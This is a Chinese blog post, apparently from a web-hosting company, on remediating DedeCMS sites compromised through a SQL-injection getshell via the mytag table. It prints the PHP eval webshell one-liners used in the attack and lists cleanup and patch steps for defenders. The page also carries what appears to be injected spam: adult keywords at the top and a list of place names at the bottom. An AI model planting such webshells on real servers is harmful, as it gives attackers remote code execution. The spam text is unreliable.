婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網站建設 > 建站知識 > 織夢網站被掛馬怎么辦?

織夢網站被掛馬怎么辦?

POST TIME:2019-05-22 23:52

1.先說說是什么木馬或者掛木馬的大鳥的方法(個人研究大概覺得吧)
內容分別為:<?php eval($_POST[guige]);?>,<?php eval($_POST[fuwu]);?> 應該是鬼哥這位大鳥發(fā)現漏洞的吧。
方法就是利用sql方法getshell,使得sql增加表mytag的內容
原因: 用的語句是update很多站 mytag 里面都沒內容。那么你用update 那有什么用 修改不了任何數據。只能用 INSERT 當然,語句帶#就會暴錯誤?!,F在要做的饒過即可.
至于手段,我就不明說了。

2.重點是如何來解決或者防患于未然。
(1)首先檢查根目錄是否有asdd.php 文件如果有 就刪除
(2)刪除plus下的90sec.php,service.php,vliw.php,vuew.php,digg.php,xiao.php,bakup.php等可疑文件。
(3)查看download.php,mytag_js.php文件最近修改日期,如果是最新時間,那么進去修改把掛的黑鏈都刪除。
(4)如果遇到織夢程序后臺plus/90sec.php的文件,得每天刪除,可是刪除了,第二天就又出現了,那么主要操作是(后臺->模板->自定義宏標記中刪除其中的條目,并且修復include/dedesql.class.php文件)———-這步重要

(5) 給plus合理的權限,數據化表現是555權限 通過ftp 如下圖,通過代碼如chmod -R 555 xxxx.com/plus

(6)刪除data/cache/mytag-9013.htm 這種類型的所有htm文件,刪除tplcache的緩存文件。發(fā)現的越來越多了
(7)如果后天多出來一個管理員,那么刪除增加的管理員:service
(8)數據庫要清空dede_mytag表
(9)臨時補丁:不知道別的地方還有沒有覆蓋變量 反正這個漏洞是修復的——————————————-重點找到include/dedesql.class.php–注釋那句話

if(isset($GLOBALS['arrs1']))

  1. {
  2. $v1 = $v2 = ”;
  3. for($i=0;isset($arrs1[$i]);$i++)
    {
    $v1 .= chr($arrs1[$i]);
    }
    for($i=0;isset($arrs2[$i]);$i++)
    {
    // $v2 .= chr($arrs2[$i]);//注釋這里
    }
    $GLOBALS[$v1] .= $v2;
    }

(10)用織夢漏洞檢測修復工具-重新檢測以前存在的漏洞。(附件免費下載–使用前還是備份數據庫以防誤殺)



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 奈曼旗| 白河县| 四子王旗| 普兰店市| 凤山市| 北京市| 岱山县| 绥宁县| 龙口市| 泗水县| 青铜峡市| 昌都县| 汉源县| 边坝县| 土默特左旗| 湘潭县| 镇赉县| 宝清县| 汽车| 盱眙县| 景泰县| 商水县| 江陵县| 河曲县| 微博| 遵义县| 灌南县| 隆德县| 邓州市| 夹江县| 昆山市| 成武县| 济宁市| 贞丰县| 碌曲县| 桃江县| 子洲县| 淮安市| 常熟市| 崇左市| 井冈山市|